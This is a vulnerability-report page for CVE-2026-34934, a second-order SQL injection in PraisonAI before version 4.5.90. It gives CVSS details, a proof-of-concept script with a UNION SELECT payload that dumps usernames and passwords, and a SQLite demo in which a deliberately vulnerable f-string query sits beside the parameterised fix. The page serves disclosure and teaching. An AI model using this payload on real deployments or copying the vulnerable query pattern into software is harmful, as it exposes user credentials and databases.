Security Vulnerability Report
CVE-2026-34934 CVSS 9.8 CRITICAL

CVE-2026-34934

Published: 2026-04-03 23:17:06
Last Modified: 2026-04-14 18:15:15

Description

PraisonAI is a multi-agent teams system. Prior to version 4.5.90, the get_all_user_threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database (CWE-89). The flaw is a second-order (stored) SQL injection: an attacker first stores a malicious thread ID via update_thread, and the payload executes later, when the application loads the thread list and interpolates the stored ID into a query, granting full database access. This issue has been patched in version 4.5.90.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 4.5.90

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC concept for CVE-2026-34934
# Demonstrates how a malicious thread ID can trigger SQL injection.
# The injection is second-order: the payload is stored first (step 1)
# and only executes when the thread list is loaded (step 2).
import requests

TARGET = "http://localhost:8000"

# The payload attempts to dump the users table.
# This ID is stored via update_thread.
malicious_id = "' UNION SELECT username, password FROM users--"


def exploit():
    print(f"[*] Attempting to inject payload via update_thread: {malicious_id}")

    # Step 1: Store the malicious thread ID.
    # Endpoint path and request fields are illustrative; the HTTP calls are
    # left commented out and must be adapted to the target deployment.
    update_data = {
        "thread_id": malicious_id,
        "content": "Exploitation attempt",
    }
    # response = requests.post(f"{TARGET}/api/update_thread", json=update_data)

    # Step 2: Trigger the vulnerability by loading threads.
    # The app calls get_all_user_threads, which constructs SQL like:
    #   SELECT * FROM threads WHERE id = '{malicious_id}'
    print("[*] Triggering get_all_user_threads to execute payload...")
    # response = requests.get(f"{TARGET}/api/get_all_user_threads")

    print("[!] If vulnerable, database data is leaked.")


if __name__ == "__main__":
    exploit()
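The PoC above only sketches the HTTP side. The following added example (written for this page, not code from PraisonAI) reproduces the second-order injection the description and PoC talk about against an in-memory SQLite database, and places the vulnerable f-string query next to the parameterised query that fixes it. The tables (users, threads), column names, the ownership model and the two get_all_user_threads variants are assumptions made for illustration; the sample rows are constructed.

```python
"""Second-order SQL injection of the kind described for CVE-2026-34934,
reproduced against SQLite, next to the parameterised form that fixes it.

Added example, not PraisonAI's code: the schema, column names and the two
get_all_user_threads variants are assumptions for illustration only.
"""
import sqlite3

# Same shape as the payload in the PoC above; it is stored as a thread ID.
PAYLOAD = "' UNION SELECT username, password_hash FROM users--"


def make_db():
    """Constructed sample data: two users and two threads owned by user u1."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("CREATE TABLE threads (id TEXT, user_id TEXT, title TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hash-a"), ("bob", "hash-b")])
    conn.executemany("INSERT INTO threads VALUES (?, ?, ?)",
                     [("t1", "u1", "first"), ("t2", "u1", "second")])
    conn.commit()
    return conn


def update_thread(conn, old_id, new_id):
    """Write path. It is parameterised, so nothing is injected here: the
    attacker merely gets to choose the string that is stored as the ID."""
    conn.execute("UPDATE threads SET id = ? WHERE id = ?", (new_id, old_id))
    conn.commit()


def _user_thread_ids(conn, user_id):
    """First query: fetch the caller's thread IDs (safe, bound parameter)."""
    return [row[0] for row in conn.execute(
        "SELECT id FROM threads WHERE user_id = ? ORDER BY rowid", (user_id,))]


def get_all_user_threads_vulnerable(conn, user_id):
    """Mimics the pre-4.5.90 pattern: IDs that came back from the database
    are spliced into a second query with an f-string, so a stored payload
    becomes part of the SQL and runs."""
    rows = []
    for tid in _user_thread_ids(conn, user_id):
        query = f"SELECT id, title FROM threads WHERE id = '{tid}'"
        rows.extend(conn.execute(query).fetchall())
    return rows


def get_all_user_threads_fixed(conn, user_id):
    """Same logic with a bound parameter: the stored ID is data, never SQL."""
    rows = []
    for tid in _user_thread_ids(conn, user_id):
        rows.extend(conn.execute(
            "SELECT id, title FROM threads WHERE id = ?", (tid,)).fetchall())
    return rows


def demo():
    """Store the payload as a thread ID, then load the thread list both ways."""
    conn = make_db()
    update_thread(conn, "t2", PAYLOAD)   # attacker-controlled write
    leaked = get_all_user_threads_vulnerable(conn, "u1")
    safe = get_all_user_threads_fixed(conn, "u1")
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable:", leaked)   # users table rows appear among the threads
    print("fixed:     ", safe)     # only the caller's two threads
```

Running it shows the point of the advisory: the write in update_thread is itself harmless, and the data that leaks comes from a later read that trusts what the database returned. Values fetched from your own database are still untrusted input for the next query; binding them as parameters is the fix, and an allowlist on the ID format at the write path is a reasonable second layer.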

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34934", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:05.533", "lastModified": "2026-04-14T18:15:14.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.90, the get_all_user_threads function constructs raw SQL queries using f-strings with unescaped thread IDs fetched from the database. An attacker stores a malicious thread ID via update_thread. When the application loads the thread list, the injected payload executes and grants full database access. This issue has been patched in version 4.5.90."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.90", "matchCriteriaId": "072B6350-7972-417B-8540-DAAFF3230EC7"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9cq8-3v94-434g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}